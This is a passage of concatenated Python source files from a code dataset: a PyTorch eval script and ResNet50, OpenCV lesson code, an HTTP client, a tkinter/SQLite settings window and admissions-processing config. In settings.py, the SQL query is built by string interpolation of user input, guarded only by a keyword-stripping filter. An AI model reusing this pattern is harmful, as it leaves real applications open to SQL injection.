+{"seq_id":"152738278","text":"import argparse\nimport os\nimport sys\n\nimport torch\nimport torch.nn.parallel\nimport torch.nn.functional as nn_func\nimport torchvision.transforms as transforms\nimport torch.utils.data.distributed\nfrom tqdm import tqdm\n\n# Replace this with your data loader and edit the calls accordingly\nfrom data_loader import EvalDataset\n\n\ndef get_parser():\n \"\"\"Defines the command line arguments\"\"\"\n parser = argparse.ArgumentParser(description='Open World Vision')\n parser.add_argument('--input_file', required=True,\n help='path to a .txt/.csv file containing paths of input images in first column of each row. '\n '\\',\\' will be used as a delimiter if a csv is provided. In text format, each row should'\n ' only contain the path of an image.')\n parser.add_argument('--out_dir', required=True,\n help='directory to be used to save the results. We will save a \\',\\' separated csv which will'\n ' be named by the next argument: ')\n parser.add_argument('--exp_name', required=True,\n help='unique name for this run of the evaluation')\n parser.add_argument('--model_path', required=True,\n help='path to model file')\n parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\n parser.add_argument('-b', '--batch-size', default=32, type=int)\n parser.add_argument('--accimage', action='store_true',\n help='use if accimage module is available on the system and you want to use it')\n return parser\n\n\ndef run(model_path, data_file, exp_name, out_dir, accimage=False, batch_size=32, workers=4):\n \"\"\"Runs the model on given data and saves the class probabilities\n\n Args:\n model_path (str): path to pytorch model file\n data_file (str): path to txt/csv file containing input images. If txt each line should only contain the path of\n an image. If csv, 1st column should have image paths\n exp_name (str): unique name for the experiment. Will be used to save output\n out_dir (str): path to dump output files\n accimage (bool): whether to use accimage loader. If calling this function outside this module, please make sure\n that accimage is importable in your python env\n batch_size (int): batch size for the model\n workers (int): no. 
of workers to be used in dataloader\n \"\"\"\n try:\n checkpoint = torch.load(model_path)\n model = checkpoint['model']\n model = torch.nn.DataParallel(model).cuda()\n model.load_state_dict(checkpoint['state_dict'])\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n # Replace this with your data-loader\n test_set = EvalDataset(\n data_file=data_file,\n accimage=accimage,\n transform=transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5],\n std=[0.5, 0.5, 0.5]),\n ]),\n header=True,\n )\n\n img_path_list = test_set.data_list\n test_loader = torch.utils.data.DataLoader(\n test_set,\n batch_size=batch_size,\n shuffle=False,\n num_workers=workers,\n pin_memory=True)\n\n img_idx_list = list()\n output_list = list()\n for img_idx, images in tqdm(test_loader):\n images = images.cuda()\n output = model(images)\n\n # Adjust these according to your model\n # output = nn_func.softmax(output[0], 1)\n output = nn_func.softmax(output[:, :413], 1).cpu()\n zero_vec = torch.zeros((output.shape[0], 1))\n output = torch.cat([zero_vec, output], dim=1)\n\n img_idx_list.append(img_idx)\n output_list.append(output)\n img_idx_list = torch.cat(img_idx_list, 0)\n output_list = torch.cat(output_list, 0)\n\n lines = list()\n for i, img_idx in enumerate(img_idx_list):\n line = [str(x) for x in output_list[i].tolist()]\n lines.append(','.join([img_path_list[img_idx]] + line))\n with open(os.path.join(out_dir, f'{exp_name}.csv'), 'w') as f:\n f.write('\\n'.join(lines))\n except FileNotFoundError:\n print(f'Could not find the model file at {model_path}')\n except KeyError:\n print(f'Saved model does not have expected format. We expect the checkpoint to have \\'model\\' and '\n f'\\'state_dict\\' keys')\n except Exception as e:\n print(e)\n\n\ndef main():\n parser = get_parser()\n args = parser.parse_args()\n if args.accimage:\n try:\n import accimage\n except ModuleNotFoundError:\n print('You opted for using accimage but we are unable to import it. 
Process will be terminated.')\n sys.exit()\n\n run(args.model_path, args.input_file, args.exp_name, args.out_dir, args.accimage, args.batch_size, args.workers)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"backup/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"357778079","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass ConvBlock(nn.Module):\n def __init__(self, in_channels=32, out_channels=32, kernel_size=3, down_sample=False):\n super(ConvBlock, self).__init__()\n self.down_sample = down_sample\n\n self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size,\n stride=2 if down_sample else 1, padding=0 if kernel_size == 1 else 1)\n self.bn1 = nn.BatchNorm2d(out_channels)\n\n def forward(self, input_tensor):\n x = self.conv1(input_tensor)\n x = self.bn1(x)\n return x\n\n\nclass ResBlock(nn.Module):\n def __init__(self, in_channels=32, out_channels=32, down_sample=False, first=False):\n super(ResBlock, self).__init__()\n self.down_sample = down_sample\n self.first = first\n\n self.conv_block1 = ConvBlock(in_channels=in_channels, out_channels=out_channels // 4, kernel_size=1, down_sample=down_sample)\n self.conv_block2 = ConvBlock(in_channels=out_channels // 4, out_channels=out_channels // 4, kernel_size=3)\n self.conv_block3 = ConvBlock(in_channels=out_channels // 4, out_channels=out_channels, kernel_size=1)\n\n if self.down_sample:\n self.shortcut = ConvBlock(in_channels=in_channels, out_channels=out_channels, kernel_size=1, down_sample=True)\n elif self.first:\n self.shortcut = ConvBlock(in_channels=in_channels, out_channels=out_channels, kernel_size=1)\n\n def forward(self, input_tensor):\n x = self.conv_block1(input_tensor)\n x = F.relu(x)\n x = self.conv_block2(x)\n x = F.relu(x)\n x = self.conv_block3(x)\n\n if self.down_sample:\n input_tensor = self.shortcut(input_tensor)\n elif self.first:\n input_tensor = self.shortcut(input_tensor)\n\n x = x + input_tensor\n x = F.relu(x)\n return x\n\n\nclass ResNet50(nn.Module):\n def __init__(self, in_channels=3, num_classes=10):\n super(ResNet50, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels=in_channels, out_channels=64, kernel_size=7, stride=2, padding=3)\n self.bn1 = nn.BatchNorm2d(64)\n self.maxpool1 = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n self.conv2_x = nn.Sequential(\n ResBlock(in_channels=64, out_channels=256, first=True),\n ResBlock(in_channels=256, out_channels=256),\n ResBlock(in_channels=256, out_channels=256)\n )\n self.conv3_x = nn.Sequential(\n ResBlock(in_channels=256, out_channels=512, down_sample=True),\n ResBlock(in_channels=512, out_channels=512),\n ResBlock(in_channels=512, out_channels=512),\n ResBlock(in_channels=512, out_channels=512),\n )\n self.conv4_x = nn.Sequential(\n ResBlock(in_channels=512, out_channels=1024, down_sample=True),\n ResBlock(in_channels=1024, out_channels=1024),\n ResBlock(in_channels=1024, out_channels=1024),\n ResBlock(in_channels=1024, out_channels=1024),\n ResBlock(in_channels=1024, out_channels=1024),\n ResBlock(in_channels=1024, out_channels=1024),\n )\n self.conv5_x = nn.Sequential(\n ResBlock(in_channels=1024, out_channels=2048, down_sample=True),\n ResBlock(in_channels=2048, out_channels=2048),\n ResBlock(in_channels=2048, out_channels=2048)\n )\n self.avg = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Linear(2048, num_classes)\n\n def forward(self, 
input_tensor):\n x = self.conv1(input_tensor)\n x = self.bn1(x)\n x = F.relu(x)\n x = self.maxpool1(x)\n\n x = self.conv2_x(x)\n x = self.conv3_x(x)\n x = self.conv4_x(x)\n x = self.conv5_x(x)\n x = self.avg(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n return x\n\n","sub_path":"models/ResNet50.py","file_name":"ResNet50.py","file_ext":"py","file_size_in_byte":3917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"449800731","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimg = cv2.imread('/Users/sty/PycharmProjects/My_world/CNN_CV/Lesson_1/Data/lenna.jpg', 1)\n\ndef my_show(img):\n plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n plt.show()\n\ndef my_show2(img1,img2):\n plt.subplot(121)\n my_show(img1)\n plt.subplot(122)\n my_show(img2)\n plt.show()\n\n# First-derivative images\n# Gaussian blur\ng_img = cv2.GaussianBlur(img, (11, 11), 2)\n# my_show(g_img)\n\n# Gaussian kernel\nkernel_1d = cv2.getGaussianKernel(11, 2)\nprint(kernel_1d)\n# Take the 1D kernel and convolve with sepFilter2D (separable Gaussian, applied along the X axis and Y axis respectively)\ng1_img = cv2.sepFilter2D(img, -1, kernel_1d, kernel_1d)\n# my_show(g1_img)\n\n# laplacian\n# second-derivative operator\nkernel = np.array([[0,1,0],[1,-4,1],[0,1,0]])\nlap_img1 = cv2.filter2D(img, -1, kernel)\n# my_show(lap_img1)\n\nkernel_strong = np.array([[1,1,1],[1,-8,1],[1,1,1]])\nlap_img2 = cv2.filter2D(img, -1, kernel_strong)\n\n# plt.figure(figsize=(10,5),dpi=120)\nplt.subplot(121)\nmy_show(lap_img1)\nplt.subplot(122)\nmy_show(lap_img2)\nplt.show()\n\n# Image sharpening: equivalent to adding an edge layer onto the original image (kernel center pixel is the Laplacian center plus 1, i.e. 8+1=9)\nkernel_r = np.array([[-1,-1,-1],[-1,9,-1],[-1,-1,-1]])\nr_img = cv2.filter2D(img, -1, kernel_r)\nplt.subplot(121)\nmy_show(img)\nplt.subplot(122)\nmy_show(r_img)\nplt.show()\n\nkernel_r2 = np.array([[0,-1,0],[-1,5,-1],[0,-1,0]])\nr_img2 = cv2.filter2D(img, -1, kernel_r2)\nplt.subplot(121)\nmy_show(img)\nplt.subplot(122)\nmy_show(r_img2)\nplt.show()\n\n# sobel\n# first-derivative operator\n\n# derivative along the y axis\nkernel_sx = np.array([[-1,-2,-1],[0,0,0],[1,2,1]])\nsx_img = cv2.filter2D(img, -1, kernel_sx)\n# derivative along the x axis (standard Sobel x kernel)\nkernel_sy = np.array([[-1,0,1],[-2,0,2],[-1,0,1]])\nsy_img = cv2.filter2D(img, -1, kernel_sy)\nplt.subplot(121)\nmy_show(sx_img)\nplt.subplot(122)\nmy_show(sy_img)\nplt.show()\n\n# medianblur\n\nn_img = cv2.imread('/Users/sty/PycharmProjects/My_world/CNN_CV/Lesson_2/Data/noise_lenna.jpg')\nmd_img = cv2.medianBlur(n_img, 7)\ngd_img = cv2.GaussianBlur(n_img,(3,3),2)\n\nplt.subplot(131)\nmy_show(n_img)\nplt.subplot(132)\nmy_show(md_img)\nplt.subplot(133)\nmy_show(gd_img)\nplt.show()\n\n# Harris Corner\n\n# def my_show_gray(img):\n# plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2GRAY),cmap='gray')\n\n# my_show_gray(img)\n# plt.show()\n\nimg_harris = cv2.cornerHarris(cv2.cvtColor(img,cv2.COLOR_BGR2GRAY), 2, 3, 0.03)\nthreshold = np.max(img_harris) * 0.02\n\nimg[img_harris > threshold] = [0, 0, 255]\nmy_show(img)\n\n\nimg_t = cv2.imread('/Users/sty/PycharmProjects/My_world/CNN_CV/Lesson_2/Data/test_corner.jpg')\nmy_show(img_t)\n\nimg_tgray = cv2.cvtColor(img_t, cv2.COLOR_BGR2GRAY)\n# img_tgray = cv2.dilate(img_tgray, None) # dilate to enlarge the response\nimg_tH = cv2.cornerHarris(img_tgray, 2, 3, 0.03)\n# img_tH = cv2.dilate(img_tH, None) # dilate to enlarge the response\n\nthreshold2 = np.max(img_tH) * 0.02\nimg_t[img_tH > threshold2] = [0, 0, 255]\nmy_show(img_t)\n\n# SIFT\n\nsift = cv2.xfeatures2d.SIFT_create()\nkp = sift.detect(img)\n\nprint(len(kp))\nkp, des = sift.compute(img, kp)\nprint(des.shape)\n\nimg_sift = cv2.drawKeypoints(img, kp, outImage=np.array([]), 
flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\nplt.figure(figsize=(10,10),dpi=100)\nmy_show(img_sift)\n","sub_path":"CNN_CV/Lesson_2/recode_l2.py","file_name":"recode_l2.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"307862284","text":"# -*- coding: utf-8 -*-\ntry:\n from .base_httpclient import BaseHttpClient\n from .logger import LoggerFactory\n from .exception import RequestErrorException\nexcept Exception:\n from fangcloudsdk.base_httpclient import BaseHttpClient\n from fangcloudsdk.logger import LoggerFactory\n from fangcloudsdk.exception import RequestErrorException\n\n\nclass RequestClient(object):\n def __init__(self):\n self.request_session = BaseHttpClient()\n self.logger = LoggerFactory.get_logger_instance()\n\n def send(\n self,\n url=None,\n method=None,\n headers=None,\n params=None,\n data=None,\n postbody=None,\n auth=None,\n oauth=None,\n stream=False,\n *args,\n **kwargs\n ):\n method = str.upper(method)\n if method == \"GET\":\n response = self.request_session.get(\n url=url, headers=headers, params=params, stream=stream\n )\n elif method == \"POST\":\n response = self.request_session.post(\n url=url, headers=headers, params=params, data=data, postbody=postbody, auth=auth\n )\n elif method == \"PUT\":\n response = self.request_session.put(\n url=url, headers=headers, data=data, postbody=postbody\n )\n elif method == \"DELETE\":\n response = self.request_session.delete(\n url=url, headers=headers, data=data, postbody=postbody\n )\n else:\n raise RequestErrorException(\"request method is not support\")\n # self.logger.debug(\"request log:\\nurl => %s\\nmethod => %s\\nheader => %s\\nparams => %s\\ndata => %s\\npostbody => %s\",\n # url, method, headers, params, data, postbody)\n self.logger.debug(\n \"request log: [url: %s], [method, %s], [header, %s], [params, %s], [data, %s], [postbody, %s]\",\n url, method, headers, params, data, postbody)\n if str(response.headers['Content-Type']) == \"image/jpeg;charset=utf-8\":\n response_json = \"is image\"\n else:\n response_json = response.json()\n self.logger.debug(\"response log: status [code: %s], [json=%s]\", response.status_code, response_json)\n return response\n","sub_path":"python-sdk/fangcloudsdk/request_client.py","file_name":"request_client.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"259859641","text":"import tkinter as tk\nimport sqlite3\n\n\nclass SettingsWindow:\n def __init__(self, master):\n self.master = master\n self.master.geometry(\"750x500+0+0\")\n self.master.title(\"Settings\")\n self.master.theme = \"grey50\"\n self.master.config(bg=\"grey50\")\n try:\n self.master.iconbitmap(\"images/settings.ico\")\n except:\n pass\n self.showWidgets()\n self.extractSettingsData()\n\n def showWidgets(self):\n '''Shows the widgets of GUI'''\n textcolor = \"yellow2\"\n textcolor1 = \"White\"\n font1 = \"Arial 8 normal\"\n font2 = \"Cascadia 12 normal\"\n frame1 = tk.Frame(self.master, bg=self.master.theme)\n frame1.pack(anchor=\"w\")\n tk.Label(frame1, text=\"App Settings\", fg=\"white\", bg=self.master.theme, font=\"Franklin 22 bold\", anchor=\"w\",\n underline=True).pack(side=tk.LEFT, padx=10, pady=20)\n frame2 = tk.Frame(self.master, bg=self.master.theme)\n frame2.pack(anchor=\"w\", padx=10)\n self.master.optional_label = tk.StringVar()\n self.master.default_city = tk.StringVar()\n self.master.default_state = 
tk.StringVar()\n self.master.default_note = tk.StringVar()\n self.master.table_label_1 = tk.StringVar()\n self.master.print_heading = tk.StringVar()\n self.master.busniess_name = tk.StringVar()\n self.master.address_line1 = tk.StringVar()\n self.master.address_line2 = tk.StringVar()\n self.master.address_line3 = tk.StringVar()\n tk.Label(frame2, text=\"Edit the required fields and press Save to store them\", bg=self.master.theme, fg=textcolor,\n font=font1).grid()\n tk.Label(frame2, text=\"Optional Field Name\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=1,\n sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.optional_label, font=font2, width=50).grid(row=1, column=1, pady=3)\n tk.Label(frame2, text=\"Default City\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=2, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.default_city, font=font2, width=50).grid(row=2, column=1, pady=3)\n tk.Label(frame2, text=\"Default State\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=3, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.default_state, font=font2, width=50).grid(row=3, column=1, pady=3)\n tk.Label(frame2, text=\"Default text for optional field\", bg=self.master.theme, fg=textcolor1, font=font2).grid(\n row=4, sticky=\"e\", pady=3)\n tk.Entry(frame2, textvariable=self.master.default_note, font=font2, width=50).grid(row=4, column=1, pady=3)\n tk.Label(frame2, text=\"Table Heading\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=5, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.table_label_1, font=font2, width=50).grid(row=5, column=1, pady=3)\n tk.Label(frame2, text=\"Print Heading\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=6, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.print_heading, font=font2, width=50).grid(row=6, column=1, pady=3)\n tk.Label(frame2, text=\"Business Name\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=7, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.busniess_name, font=font2, width=50).grid(row=7, column=1, pady=3)\n tk.Label(frame2, text=\"Address Line1\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=8, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.address_line1, font=font2, width=50).grid(row=8, column=1, pady=3)\n tk.Label(frame2, text=\"Address Line2\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=9, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.address_line2, font=font2, width=50).grid(row=9, column=1, pady=3)\n tk.Label(frame2, text=\"Address Line3\", bg=self.master.theme, fg=textcolor1, font=font2).grid(row=10, sticky=\"e\",\n pady=3)\n tk.Entry(frame2, textvariable=self.master.address_line3, font=font2, width=50).grid(row=10, column=1, pady=3)\n frame3 = tk.Frame(self.master, bg=self.master.theme)\n frame3.pack(anchor=\"w\", padx=10)\n tk.Button(frame3, text=\"Save\", font=font2, bd=3, relief=tk.RAISED, command=self.updateSettings).pack(padx=30,\n pady=10,\n side=tk.LEFT)\n tk.Button(frame3, text=\"Close\", font=font2, bd=3, relief=tk.RAISED, command=self.master.destroy).pack(pady=10,\n padx=4,\n side=tk.LEFT)\n\n def extractSettingsData(self):\n '''Extracts settings data from the database and sets the widgets'''\n conn = sqlite3.connect(\"DB/database\")\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM appdata WHERE srl='1'\")\n for data in cursor:\n self.master.optional_label.set(self.recover(data[1]))\n 
self.master.default_city.set(self.recover(data[2]))\n self.master.default_state.set(self.recover(data[3]))\n self.master.default_note.set(self.recover(data[4]))\n self.master.table_label_1.set(self.recover(data[5]))\n self.master.print_heading.set(self.recover(data[6]))\n self.master.busniess_name.set(self.recover(data[7]))\n self.master.address_line1.set(self.recover(data[8]))\n self.master.address_line2.set(self.recover(data[9]))\n self.master.address_line3.set(self.recover(data[10]))\n cursor.close()\n conn.close()\n\n def updateSettings(self):\n # Truncate each field to its maximum length, then sanitize it before writing it back\n optional_label = self.prepare(self.master.optional_label.get()[:50])\n default_city = self.prepare(self.master.default_city.get()[:50])\n default_state = self.prepare(self.master.default_state.get()[:50])\n default_note = self.prepare(self.master.default_note.get()[:50])\n table_label_1 = self.prepare(self.master.table_label_1.get()[:50])\n print_heading = self.prepare(self.master.print_heading.get()[:150])\n busniess_name = self.prepare(self.master.busniess_name.get()[:150])\n address_line1 = self.prepare(self.master.address_line1.get()[:150])\n address_line2 = self.prepare(self.master.address_line2.get()[:150])\n address_line3 = self.prepare(self.master.address_line3.get()[:150])\n conn = sqlite3.connect(\"DB/database\")\n cursor = conn.cursor()\n query = f'''UPDATE appdata SET optional_label='{optional_label}',default_city='{default_city}',default_state='{default_state}',default_note='{default_note}',table_label_1='{table_label_1}',print_heading='{print_heading}',busniess_name='{busniess_name}',address_line1='{address_line1}',address_line2='{address_line2}',address_line3='{address_line3}' WHERE srl=1'''\n cursor.execute(query)\n conn.commit()\n cursor.close()\n conn.close()\n self.extractSettingsData()\n tk.Label(self.master, text=\"Information: Settings updated. 
Restart the program to make changes in effect.\",\n bg=\"yellow green\", fg=\"white\", font=\"Arial 12 italic\").pack(side=tk.LEFT, anchor=\"w\", padx=10)\n\n def recover(self, data):\n data = data.replace(\"{\", \"(\")\n data = data.replace(\"}\", \")\")\n data = data.replace(\"^\", \"\\'\")\n return data\n\n def prepare(self, data):\n data = data.replace(\"(\", \"{\")\n data = data.replace(\")\", \"}\")\n data = data.replace(\"\\'\", \"^\")\n data = data.replace(\"\\\"\", \"\")\n data = data.replace(\";\", \"\")\n data = data.replace(\"DELETE\", \"\")\n data = data.replace(\"DROP\", \"\")\n return data\n\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n app = SettingsWindow(root)\n root.mainloop()","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":9714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"293866347","text":"# stdlib imports\nimport os\nimport time\nfrom shutil import which\n\n# third party imports\nimport numpy as np\nimport pandas as pd\n\n# local imports\nfrom gmprocess.config import get_config\n\nPREAMBLE = \"\"\"\n\\\\documentclass[9pt]{article}\n\\\\usepackage{helvet}\n\\\\renewcommand{\\\\familydefault}{\\\\sfdefault}\n\n\\\\usepackage{graphicx}\n\n% grffile allows for multiple dots in image file name\n\\\\usepackage{grffile}\n\n% Turn off page numbers\n\\\\usepackage{nopageno}\n\n% Needed for table rules\n\\\\usepackage{booktabs}\n\n\\\\usepackage[english]{babel}\n\n\\\\usepackage[letterpaper, portrait]{geometry}\n\n\\\\geometry{\n left=0.5in,\n top=0.5in,\n}\n\n\\setlength\\parindent{0pt}\n\n\\\\begin{document}\n\"\"\"\n\nPOSTAMBLE = \"\"\"\n\\\\end{document}\n\"\"\"\n\nSTREAMBLOCK = \"\"\"\n\\\\includegraphics[height=6.5in]\n {[PLOTPATH]}\n\n\"\"\"\n\nBEGIN_COL = \"\"\"\\\\begin{minipage}[t]{%s\\\\textwidth} \\\\scriptsize \\\\centering\"\"\"\n\nEND_COL = \"\"\"\\\\end{minipage}\"\"\"\n\n\ndef build_report(sc, directory, origin, config=None):\n \"\"\"\n Build latex summary report.\n\n Args:\n st (StreamCollection):\n StreamCollection of data.\n directory (str):\n Directory for saving report.\n\n \"\"\"\n # Need to get config to know where the plots are located\n if config is None:\n config = get_config()\n processing_steps = config['processing']\n # World's ugliest list comprehension:\n spd = [psd for psd in processing_steps\n if list(psd.keys())[0] == 'summary_plots'][0]\n plot_dir = spd['summary_plots']['directory']\n\n # Check if directory exists, and if not, create it.\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n # Initialize report string with PREAMBLE\n report = PREAMBLE\n\n # Loop over each StationStream and append it's page to the report\n # do not include more than three.\n for st in sc:\n plot_path = os.path.join('..', plot_dir, st.get_id() + '.png')\n SB = STREAMBLOCK.replace('[PLOTPATH]', plot_path)\n report += SB\n\n prov_latex = get_prov_latex(st)\n\n # for i, tr in enumerate(st):\n # # Disallow more than three columns\n # if i > 2:\n # break\n # if i == 0:\n # prov_latex = get_prov_latex(tr)\n # report += BEGIN_COL % \"0.4\"\n # else:\n # prov_latex = get_prov_latex(tr, include_prov_id=False)\n # report += BEGIN_COL % \"0.27\"\n # report += prov_latex\n # if tr.hasParameter('failure'):\n # report += '\\n' + tr.getParameter('failure')['reason']\n # report += END_COL\n # if i < len(st):\n # report += '\\\\hspace{2em}'\n report += prov_latex\n if not st.passed:\n for tr in st:\n if tr.hasParameter('failure'):\n report += '\\n' + 
tr.getParameter('failure')['reason']\n break\n report += '\\n\\\\newpage\\n\\n'\n\n # Finish the latex file\n report += POSTAMBLE\n\n # Do not save report if running tests\n if 'CALLED_FROM_PYTEST' not in os.environ:\n file_name = ('gmprocess_report_%s_%s.tex'\n % (origin['id'], time.strftime(\"%Y%m%d-%H%M%S\")))\n file_path = os.path.join(directory, file_name)\n with open(file_path, 'w') as f:\n f.write(report)\n\n # Can we find pdflatex?\n pdflatex_bin = which('pdflatex')\n # rc, so, se = get_command_output('%s %s' % (pdflatex_bin, file_path))\n return st\n\n\ndef get_prov_latex(st):\n \"\"\"\n Construct a latex representation of a trace's provenance.\n\n Args:\n st (StationStream):\n StationStream of data.\n\n Returns:\n str: Latex tabular representation of provenance.\n \"\"\"\n # start by sorting the channel names\n channels = [tr.stats.channel for tr in st]\n channelidx = np.argsort(channels).tolist()\n columns = ['Process Step',\n 'Process Attribute']\n\n trace1 = st[channelidx.index(0)]\n df = pd.DataFrame(columns=columns)\n df = trace1.getProvDataFrame()\n mapper = {'Process Value': '%s Value' % trace1.stats.channel}\n df = df.rename(mapper=mapper, axis='columns')\n for i in channelidx[1:]:\n trace2 = st[i]\n trace2_frame = trace2.getProvDataFrame()\n df['%s Value' % trace2.stats.channel] = trace2_frame['Process Value']\n\n lastrow = None\n newdf = pd.DataFrame(columns=df.columns)\n for idx, row in df.iterrows():\n if lastrow is None:\n lastrow = row\n newdf = newdf.append(row, ignore_index=True)\n continue\n if row['Index'] == lastrow['Index']:\n row['Process Step'] = ''\n newdf = newdf.append(row, ignore_index=True)\n lastrow = row\n\n newdf = newdf.drop(labels='Index', axis='columns')\n prov_string = newdf.to_latex(index=False)\n prov_string = '\\\\scriptsize\\n\\\\centering\\n' + prov_string\n return prov_string\n\n\ndef str_for_latex(string):\n \"\"\"\n Helper method to convert some strings that are problematic for latex.\n \"\"\"\n string = string.replace('_', '\\\\_')\n string = string.replace('$', '\\\\$')\n string = string.replace('&', '\\\\&')\n string = string.replace('%', '\\\\%')\n string = string.replace('#', '\\\\#')\n string = string.replace('}', '\\\\}')\n string = string.replace('{', '\\\\{')\n string = string.replace('~', '\\\\textasciitilde ')\n string = string.replace('^', '\\\\textasciicircum ')\n return string\n","sub_path":"gmprocess/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":5432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"474878504","text":"from __future__ import print_function #allows print as function\nimport sys, os.path\n\nVERBOSE = False\n\ndef die(*objs):\n print(\"ERROR: \", *objs, file=sys.stderr)\n exit(42)\n\nHOME_DIR = os.environ['HOME'] \nif not os.path.exists(HOME_DIR): die(\"HOME_DIR\", HOME_DIR, \"does not exist\")\n\nTOOLS_DIR = os.path.join(HOME_DIR,\"git\",\"dcs-gradapps-prefilter\")\nif not os.path.exists(TOOLS_DIR): die(\"TOOLS_DIR\", TOOLS_DIR, \"does not exist\")\n\n#where we rsync gradapps backup server to\nMSCAC_DIR = os.path.join(HOME_DIR,\"mscac\")\nif not os.path.exists(MSCAC_DIR): die(MSCAC_DIR, \"does not exist\")\n\n#dir where transcripts, sop, cv live\nMSCAC_PAPERS_DIR = os.path.join(MSCAC_DIR,\"public_html\",\"papers\")\nif not os.path.exists(MSCAC_PAPERS_DIR): die(MSCAC_PAPERS_DIR, \"does not exist\")\n\n#dir where application dirs containing profile.data live\nMSCAC_PROFILE_DATA_ROOT_DIR = 
os.path.join(MSCAC_DIR,\"public_html\",\"data\")\nif not os.path.exists(MSCAC_PROFILE_DATA_ROOT_DIR): die(MSCAC_PROFILE_DATA_ROOT_DIR, \"does not exist\")\n\n#CSV file university rankings are read from\nUNI_RANKING_CSV=os.path.join(MSCAC_DIR,\"uni-ranking.csv\")\nif not os.path.exists(UNI_RANKING_CSV): die(UNI_RANKING_CSV, \"university ranking file does not exist\")\n\n#shell script to fire up viewers on PDF files\nVIEWER = os.path.join(TOOLS_DIR,\"view-files.sh\")\nif not os.path.exists(VIEWER): die(VIEWER, \"does not exist\")\n\nGREP_SGS_NUM = os.path.join(TOOLS_DIR,\"grep-sgs-num.sh\")\nif not os.path.exists(GREP_SGS_NUM): die(GREP_SGS_NUM, \"does not exist\")\n\nGREP_ONE_SGS_NUM = os.path.join(TOOLS_DIR,\"grep-one-sgs-app-num.sh\")\nif not os.path.exists(GREP_ONE_SGS_NUM): die(GREP_SGS_NUM, \"does not exist\")\n \n#file listing which apps are complete\nCOMPLETE_FILE = os.path.join(MSCAC_DIR,\"public_html/admin/applicationStatus\")\nif not os.path.exists(COMPLETE_FILE): die(COMPLETE_FILE, \"does not exist\")\n\n#output file directory\nMSCAC_PREFILTER_DIR_NAME = \"mscac-prefilter\"\nOFN_DIR=os.path.join(HOME_DIR,MSCAC_PREFILTER_DIR_NAME)\nif not os.path.exists(OFN_DIR): die(\"OFN_DIR\", OFN_DIR, \"does not exist\")\n\n# where to rsync output file for gradapps\nCSLAB_USERID = 'matz@apps1.cs.toronto.edu'\n \n#obscure python way of deleting chars from unicode strings..\ntranslation_table_to_delete_chars = dict.fromkeys(map(ord, '!@#$;\"'), None)\n\ndef parse_rhs_profile_data_line(line):\n \"returns stuff to right of = found in gradapps profile.data files\"\n # EG: #set $sp364-value$ = \"2014-09|2018-05|UNIV OF TORONTO|BSC H|2.88/4.0|||||||||||||||\"; \n if VERBOSE: print(\"rhs\",line)\n try:\n rhs = line.split(\"=\")[1]\n except:\n print(\"failed to split = on \", line)\n exit(3)\n return rhs.strip().translate(translation_table_to_delete_chars)\n\n\ndef uni_ranking_dict_from_csv_file(fn,has_header):\n \"reads csv file mapping university name to (claire's) ranking\"\n import functools, csv\n #example line in CSV file:\n #UNIV OF TORONTO,1,top rank (canada),Canada,\n with open(fn) as csv_file:\n csv_file_reader = csv.reader(csv_file, delimiter=',', quotechar='\"',dialect=csv.excel_tab)\n if has_header:\n next(csv_file_reader)\n def acc(d, fields):\n d[fields[0]] = fields[1] \n return d\n return functools.reduce(acc, csv_file_reader, {})\n\n\ndef completed_dict_from_applicationStatus_file(fn):\n \"reads applicationStatus files and stashes away which apps are complete\"\n with open(fn,\"r\") as apf:\n import re\n map = {}\n for line in apf:\n fields = line.split(\" \")\n assert len(fields) == 2\n #TODO: re.compile ?\n if re.search(\"complete\",fields[1]):\n map[fields[0]] 